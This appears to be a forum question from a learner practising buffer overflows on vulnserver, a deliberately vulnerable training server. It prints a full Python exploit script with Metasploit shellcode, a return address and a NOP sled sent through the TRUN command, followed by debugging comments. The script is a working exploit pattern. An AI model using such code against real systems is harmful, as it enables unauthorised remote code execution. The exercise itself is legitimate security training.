# I'm in the last step to attack vulnserver with a buffer overflow, but the payload isn't working

Tags: python

I thought I'd ask on here cause vulnserver seems to be a common server to practice buffer overflows on, so I'm hoping someone will have encountered this problem. I'm following a course that goes over buffer overflows, and uses vulnserver as a practice server. I've done everything I can to follow the course to a T.
I followed everything, and it all went according to the course. Up until the moment where you generate shell code and send it to the computer.
The code connects to vulnserver, but crashes the server.

Here is the python code:
The overflow variable contains the payload.

```
    #!/usr/bin/python
    import sys,socket
    overflow = ("\xba\x67\x49\x38\xd3\xd9\xe8\xd9\x74\x24\xf4\x58\x29\xc9"
    "\xb1\x52\x31\x50\x12\x03\x50\x12\x83\xa7\x4d\xda\x26\xdb"
    "\xa6\x98\xc9\x23\x37\xfd\x40\xc6\x06\x3d\x36\x83\x39\x8d"
    "\x3c\xc1\xb5\x66\x10\xf1\x4e\x0a\xbd\xf6\xe7\xa1\x9b\x39"
    "\xf7\x9a\xd8\x58\x7b\xe1\x0c\xba\x42\x2a\x41\xbb\x83\x57"
    "\xa8\xe9\x5c\x13\x1f\x1d\xe8\x69\x9c\x96\xa2\x7c\xa4\x4b"
    "\x72\x7e\x85\xda\x08\xd9\x05\xdd\xdd\x51\x0c\xc5\x02\x5f"
    "\xc6\x7e\xf0\x2b\xd9\x56\xc8\xd4\x76\x97\xe4\x26\x86\xd0"
    "\xc3\xd8\xfd\x28\x30\x64\x06\xef\x4a\xb2\x83\xeb\xed\x31"
    "\x33\xd7\x0c\x95\xa2\x9c\x03\x52\xa0\xfa\x07\x65\x65\x71"
    "\x33\xee\x88\x55\xb5\xb4\xae\x71\x9d\x6f\xce\x20\x7b\xc1"
    "\xef\x32\x24\xbe\x55\x39\xc9\xab\xe7\x60\x86\x18\xca\x9a"
    "\x56\x37\x5d\xe9\x64\x98\xf5\x65\xc5\x51\xd0\x72\x2a\x48"
    "\xa4\xec\xd5\x73\xd5\x25\x12\x27\x85\x5d\xb3\x48\x4e\x9d"
    "\x3c\x9d\xc1\xcd\x92\x4e\xa2\xbd\x52\x3f\x4a\xd7\x5c\x60"
    "\x6a\xd8\xb6\x09\x01\x23\x51\xf6\x7e\x62\x25\x9e\x7c\x74"
    "\x34\x03\x08\x92\x5c\xab\x5c\x0d\xc9\x52\xc5\xc5\x68\x9a"
    "\xd3\xa0\xab\x10\xd0\x55\x65\xd1\x9d\x45\x12\x11\xe8\x37"
    "\xb5\x2e\xc6\x5f\x59\xbc\x8d\x9f\x14\xdd\x19\xc8\x71\x13"
    "\x50\x9c\x6f\x0a\xca\x82\x6d\xca\x35\x06\xaa\x2f\xbb\x87"
    "\x3f\x0b\x9f\x97\xf9\x94\x9b\xc3\x55\xc3\x75\xbd\x13\xbd"
    "\x37\x17\xca\x12\x9e\xff\x8b\x58\x21\x79\x94\xb4\xd7\x65"
    "\x25\x61\xae\x9a\x8a\xe5\x26\xe3\xf6\x95\xc9\x3e\xb3\xb6"
    "\x2b\xea\xce\x5e\xf2\x7f\x73\x03\x05\xaa\xb0\x3a\x86\x5e"
    "\x49\xb9\x96\x2b\x4c\x85\x10\xc0\x3c\x96\xf4\xe6\x93\x97"
    "\xdc")

    shellcode = "A" * 2003 + "\xaf\x11\x50\x62" +"\x90" *32 + overflow

    try:
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(('192.168.1.134',9999))
        s.send(('TRUN /.:' + shellcode).encode())
        s.close()
    except:
        print ("Error connecting to server")
        sys.exit()
```

I don't understand C whatsoever, so I don't have any way to bug test the payload code

A summary of what I've tried to make it work:
Both immunity debugger and vulnserver have administrative priviledges, and fresh instances.
I clicked play on immunity debugger.
Real-time protection was off.
I've made sure there are no bad characters, so unless vulnserver got new ones since the course came out, I didn't miss any.
The buffer size was different on my computer, saying it was 2004 bytes instead of 2003, until later when it started causing problems. I tried with both 2004 and 2003 but neither work.
My VM was running on that port.

The program is supposed to give me root access to the server.

Comment: `overflow` looks line a horrendous string, is that what it is supposed to be ?  because `shellcode` extends on that...

Comment: also, are you able to connect prior to the `send` in the `try` block ?

Comment: The horrendous string is the payload. It was generated with metasploit.

Comment: in that respect please post the error message  that you get...

Comment: I do not get an error message. The server crashes and closes completely. I can send what the eip and such look like from immunity debugger

Comment: There is a weird hex code 'C2' that just appears and I don't know why it's there.

Comment: The EBP is this: C2414141 which is supposed to be a bunch of A's but I don't know why C2 is there.
And then this is what the EIP looks like when it crashes
90C290C2
When I get rid of the 90 x 32, the EIP looks like this:
4967BAC2
There's that C2 character again coming from nowhere